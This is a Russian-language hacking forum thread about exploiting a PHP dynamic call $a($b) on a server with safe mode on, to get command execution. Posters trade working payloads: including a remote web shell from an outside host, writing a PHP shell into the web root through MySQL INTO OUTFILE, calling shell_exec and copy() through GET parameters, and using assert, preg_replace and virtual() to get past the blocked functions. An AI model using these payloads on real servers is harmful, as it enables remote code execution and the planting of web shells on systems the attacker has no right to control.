точнее взлом с помощью 2 переменных)
возможно ли?)

$lol=$a($b);

соответственно $a и $b можно подставить свои

system,exec не катят)

readfile работает,но толку от чтения файлов нет)

$a=include
$b='http://oneline.ucoz.ru/madshell.php'

$a=include
$b='http://oneline.ucoz.ru/madshell.php'
Это не функция, а языковая конструкция
$a = array('include', 'require', 'eval');
var_dump(array_map('function_exists', $a));

ps: вопрос весьма интересный, перерываю php.net :)

UPD:
первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
Функция - mysql_query, параметр select '<?php include "http://site.ru/shell.txt"; ?>' into outfile '/путь_до_корня_сервера/shell.php'

?a=shell_exec&b=you command
шелл, но без вывода.

copy("http://xaker.ru/shell.txt", "shell.php");
eval($_GET[id]);

вариантов масса

eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее

благодаря

$a=phpinfo;
$b=-1;


выяснилось что на серве safe mode - ON )

потому все "вкусные" функции не пашут)

eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее

А так ?


site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]

не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)

А так ?


site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]
Ты хоть пробовал?
ubuntu LAMP
Warning: Wrong parameter count for copy() in /var/www/f23.php on line 2

не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
В том и фишка, если бы все было так просто) ...

уже давно пора забить на всякие *exec - туфта все

assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.

вообщем помогла
virtual() :)

причем инклюд лоальных файлов file.wav не канал ,а вот file.php.wav заработал)))


п.с. : интересная функция ассерт ) бум знать на будущее)))))

вообщем помогла
virtual() :)

причем инклюд лоальных файлов file.wav не канал ,а вот file.php.wav заработал)))


п.с. : интересная функция ассерт ) бум знать на будущее)))))
если сработала virtual(), то можно было с таким же успехом просто напрямую обратится к твоему file.php.wav.